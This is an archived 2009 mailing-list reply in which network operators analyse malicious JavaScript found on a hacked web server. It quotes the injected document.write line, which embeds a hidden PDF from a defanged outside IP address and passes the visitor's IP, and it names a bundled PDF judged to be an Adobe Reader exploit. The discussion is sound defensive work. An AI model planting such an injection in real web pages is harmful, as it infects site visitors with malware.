nanog mailing list archives
Re: Malicious code just found on web server
From: Chris Mills <securinate () gmail com>
Date: Fri, 17 Apr 2009 18:34:54 -0400
You beat me to it. -ChrisAM On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster () gmail com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster () gmail com> wrote:On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate () gmail com> wrote:I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>"); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed> That PDF is on the site, I haven't looked at it yet though.Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location. We've been seeing a lot of this lately.Yes, definitely malicious: http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b - - ferg -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w /K0hKsJiAz4RGu8VQkyP+js= =AzJq -----END PGP SIGNATURE----- -- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Current thread:
- Re: Malicious code just found on web server, (continued)
- Re: Malicious code just found on web server Nathan Ward (Apr 21)
- Re: Malicious code just found on web server Nick Chapman (Apr 20)
- Re: Malicious code just found on web server Paul Ferguson (Apr 20)
- Re: Malicious code just found on web server Ingo Flaschberger (Apr 20)
- Re: Malicious code just found on web server Gadi Evron (Apr 20)
- Re: Malicious code just found on web server Kevin Oberman (Apr 21)
- Re: Malicious code just found on web server Chris Mills (Apr 17)
- Re: Malicious code just found on web server Paul Ferguson (Apr 17)
- Re: Malicious code just found on web server Paul Ferguson (Apr 17)
- Re: Malicious code just found on web server Chris Mills (Apr 17)
- Re: Malicious code just found on web server Jake Mailinglists (Apr 17)